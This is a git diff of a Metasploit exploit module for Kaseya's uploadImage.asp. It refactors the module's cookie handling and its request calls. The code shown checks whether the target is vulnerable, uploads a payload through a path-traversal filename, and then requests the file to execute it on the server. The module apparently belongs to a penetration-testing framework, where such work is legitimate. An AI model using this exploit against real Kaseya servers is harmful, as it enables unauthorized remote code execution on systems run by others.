diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index d33ae5d8fa..a73caed524 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri('SystemTab','uploadImage.asp') }) - + # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404 if not res or res.code != 500 @@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end - def get_cookie - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri("SystemTab", "uploadImage.asp") - }) - - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] - else - fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue") - end - - cookie - end - def exploit peer = "#{rhost}:#{rport}" @@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') - cookie = get_cookie - res = send_request_raw({ + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("SystemTab", "uploadImage.asp") + }) + + cookie = res.get_cookies + + res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"), "data" => data, @@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote "cookie" => cookie }) - register_files_for_cleanup(@payload_name) - if not res or res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end + register_files_for_cleanup(@payload_name) + print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name),